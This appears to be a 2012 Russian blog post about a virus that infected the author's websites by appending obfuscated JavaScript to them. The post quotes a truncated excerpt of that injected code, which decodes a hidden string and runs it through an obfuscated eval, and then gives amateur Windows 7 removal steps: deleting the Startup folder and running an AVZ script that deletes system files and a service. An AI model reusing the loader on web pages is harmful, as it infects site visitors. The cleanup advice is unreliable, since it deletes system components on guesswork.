Компьютерные вирусы
- Подробности
- Категория: Компьютеры, ПО
- Опубликовано 18.05.2012 21:11
Нередко случается такое что и антивирусники не в силах помочь нам бороться с вирусной атакой, в таких случаях только одно решение - бороться всем вместе, помогая друг другу знаниями в этой среде.
Хочу представить вам вирус, который как то попал ко мне через мои же сайты, как он попал на мои сайты - для меня до сих пор открытый вопрос. Но что я знаю, этот вирус распространяется на сайте через java скрипты, дописывая в них свой код, я извлёк дописываемую им часть, выглядит она как то так:
try{q=document.createElement("u");q.appendChild(q+);}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="17$48$55.5$52$46.5$55$49..( из за большого обьёма большую часть вырезал ) .."[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-683!=0;i++){k=i;s=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);
Но из-за своей неграмотности в java программировании я так и не смог разобраться в этих иероглифах и понять, как именно этот код заставил меня мучаться в лечении своего компа несколько часов. Что же именно произошло? Во-первых каждую минуту Касперский Кристалл Мне гласил что процесс svchost.exe пытается запустить некую вредоносную ссылку, которая каждый раз была новая и по длинне не уступала осени в России. Было ясно что Касперского лучше не отключать, а в принципе и проку от него было немного - проверка всего компа ничего не дала, всё чисто, я не стал использовать другие антивирусники, а решил попытаться разрулить проблему сам. В итоге я избавился от этой напасти, теперь как это сделать? Сразу говорю у меня стоит win7, и могу с уверенностью утверждать что сей рецепт для семёрки, насчёт других операционных систем сказать наверняка не могу.
1. Для начала запустите Касперского, пусть ежеминутно блокирует вредоносные действия процесса svchost.exe
2. Забредите в своём компе к папке автозагрузки, для незнающих это путь C:\Users\Имя_Пользователя\AppData\Roaming\Microsoft\Windows\Start Menu\Programs . И вот в этой папке ищем папку Автозагрузка или Startup и удаляем её ко всем чертям ( ДАЖЕ ЕСЛИ ОНА НА ПЕРВЫЙ ВЗГЛЯД КАЖЕТСЯ ПУСТОЙ ). Вам, скорее всего, семёрка скажет что мол удаляемое запущено в svchost.exe, но не беда открываем диспетчер задач Ctrl+Alt+Del, находим его в списке и завершаем, тут же незамедлительно ( пока он вновь не запустился ) удаляем папку Автозагрузка.
3. Всё, после проделанной работы, Касперский вновь спустя небольшое время начнёт ежеминутно нам твердить, что svchost.exe опять пытается выполнить вредоносные ссылки. Так и должно быть. Теперь, скачиваем себе программу , и выполняем в ней следующий скрипт:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
ClearQuarantine;
SetServiceStart('WaitSvc', 4);
StopService('TCPZ');
QuarantineFile('C:\WINDOWS\system32\msvcp90.dll','');
QuarantineFile('C:\WINDOWS\system32\drivers\tcpz-x86d.sys','');
QuarantineFile('C:\WINDOWS\system32\waitaprnlib.dll','');
QuarantineFile('C:\WINDOWS\System32\Drivers\akyrio9l.SYS','');
DeleteFile('C:\WINDOWS\System32\Drivers\akyrio9l.SYS');
DeleteFile('c:\windows\system32\waitaprnlib.dll');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\WaitSvc\Parameters','ServiceDll');
DeleteService('WaitSvc', );
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
Если вы не знаете как выполнить скрипт Файл > Выполнить скрипт , далее вставляете вышеуказанный скрипт в форму и жмёте кнопку "Выполнить". После незатейлевых действий программы последует перезагрузка ПК, так что настоятельно рекомендую заранее сохранить и закрыть то что дорого. И вот после перезагрузки никаких вирусов быть не должно.
Если у вас возникнут какие то вопросы, или вирус какой то, пишите в комментариях.